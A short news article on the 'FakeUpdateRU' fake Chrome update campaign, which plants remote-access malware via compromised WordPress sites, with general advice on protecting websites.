Amid the constantly evolving realm of cybersecurity, a persistent menace rears its head in the form of a deceptive fake Chrome update. This fraudulent software, posing as a legitimate browser update, remains active and continues to pose a significant threat to unsuspecting users.
The fake Chrome update is more than it seems, as it operates as a Remote Access Trojan (RAT) that can gain control of your computer. Often serving as the initial step in a ransomware attack, this malware can lead to substantial financial losses and data breaches.
Read More: IndiGo Big Update: Airline Clarifies Web Check-In Not Mandatory | Read Statement Here
Cybersecurity experts have discovered a fresh variant of this malware, dubbed “FakeUpdateRU” by Jerome Segura of MalwareBytes. Notably, this is distinct from the previous SocGholish malware, signaling the involvement of a different hacker group capitalizing on the growing demand for ransomware attacks.
Numerous similar groups have emerged recently, prompting a swift response from Google. The tech giant has taken action to block most websites distributing this malware, displaying warning pages if users attempt to access them. The malware manipulates the main index[.]php file of website themes, closely mimicking the appearance of an authentic Chrome update page.
What sets the fake Chrome update apart is its use of plain HTML code sourced from the UK English version of Google’s website. This suggests that the hackers employed a Chrome (Chromium-based) browser to craft the malware, resulting in the presence of Russian words in the files, even for non-Chrome users.
Read More: ICICI Bank Customers: Here’s How You Can Manage Fixed Deposits On IMobile, Check Step-By-Step Guide
The malware’s true danger lies in the JavaScript code at the bottom of the fraudulent update page. This code initiates the malware download when users click the “Update” button, using a Chrome-themed domain to acquire the final download URL, typically on another compromised website. The malware is associated with the Zgrat and Redline Stealer malware families, both known for their involvement in ransomware attacks.
Crucially, the fake update pages and the malware files are hosted on different hacked websites. Hackers employ multiple domains with similar names to redirect users to the malware .ZIP file, continually changing and registering them to maintain the scale of their malicious campaign.
To identify infected websites, users can search for a specific Google Tag Manager script, offering insight into the extent of the threat. In response to Google’s swift action in blocking domains that redirect users, hackers have adapted their tactics by linking directly to downloads on other compromised websites. This necessitates the reinfection of numerous sites, rather than altering a single file on their server.
To guard against these Chrome updates that include malware threats, experts recommend keeping plugins and themes updated, fortifying WordPress websites, and maintaining regular data backups.
